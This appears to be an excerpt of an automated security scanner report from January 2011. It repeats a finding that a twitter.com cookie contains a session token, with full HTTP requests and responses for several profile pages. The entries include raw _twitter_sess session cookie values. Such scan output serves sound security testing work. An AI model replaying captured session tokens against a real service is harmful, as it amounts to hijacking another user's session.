The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PhantomGourmet HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:53 GMT Server: hi Status: 200 OK X-Transaction: 1296266033-91577-32859 ETag: "161ed10fae22588b3ed41cf62918d8a5" Last-Modified: Sat, 29 Jan 2011 01:53:53 GMT X-Runtime: 0.00903 Content-Type: text/html; charset=utf-8 Content-Length: 47996 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Prucenter HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:54:03 GMT Server: hi Status: 200 OK X-Transaction: 1296266043-49777-22631 ETag: "6809b20e173abb1f6aa98709f0f9d6dc" Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT X-Runtime: 0.01106 Content-Type: text/html; charset=utf-8 Content-Length: 52276 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PureADK HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:28 GMT Server: hi Status: 200 OK X-Transaction: 1296225028-9085-29245 ETag: "6ea59f215eff63985173a556c3c58572" Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT X-Runtime: 0.01097 Content-Type: text/html; charset=utf-8 Content-Length: 57696 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ROBERTPLANT HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:49 GMT Server: hi Status: 200 OK X-Transaction: 1296265969-51236-50087 ETag: "2065838d33813f1ed4f56a5980ac687e" Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT X-Runtime: 0.02165 Content-Type: text/html; charset=utf-8 Content-Length: 21714 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealLamarOdom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:26 GMT Server: hi Status: 200 OK X-Transaction: 1296266006-7436-1947 ETag: "176880d5a04c3fcd8b68fb306d4172bf" Last-Modified: Sat, 29 Jan 2011 01:53:26 GMT X-Runtime: 0.01342 Content-Type: text/html; charset=utf-8 Content-Length: 49980 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RobertDuffy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-67311-52082 ETag: "e57068ea600d03f7a7bf890e4a74a917" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.01335 Content-Type: text/html; charset=utf-8 Content-Length: 50645 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ScampoLiberty HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:49:26 GMT Server: hi Status: 200 OK X-Transaction: 1296265766-16900-43971 ETag: "8619adc934bf80f7ed7769cb2e43b4b1" Last-Modified: Sat, 29 Jan 2011 01:49:26 GMT X-Runtime: 0.00936 Content-Type: text/html; charset=utf-8 Content-Length: 50190 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Script_Junkie HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-37028-38797 ETag: "942c1294489429968d893d85a4217f57" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01350 Content-Type: text/html; charset=utf-8 Content-Length: 47541 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Sean_P_Doyle HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:50 GMT Server: hi Status: 200 OK X-Transaction: 1296265970-13440-19408 ETag: "cb86339c5381a14bf8b1d3e2b36126a2" Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT X-Runtime: 0.01448 Content-Type: text/html; charset=utf-8 Content-Length: 49550 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Servigistics HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:35 GMT Server: hi Status: 200 OK X-Transaction: 1296225035-39147-1499 ETag: "7908e6f2089de69430d5a81b1f257ac2" Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT X-Runtime: 0.01232 Content-Type: text/html; charset=utf-8 Content-Length: 50563 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ShaunieONeal HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:53 GMT Server: hi Status: 200 OK X-Transaction: 1296265973-84120-54992 ETag: "f0218d983026f5440ea1c0cdd842e2ee" Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT X-Runtime: 0.01493 Content-Type: text/html; charset=utf-8 Content-Length: 50321 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ 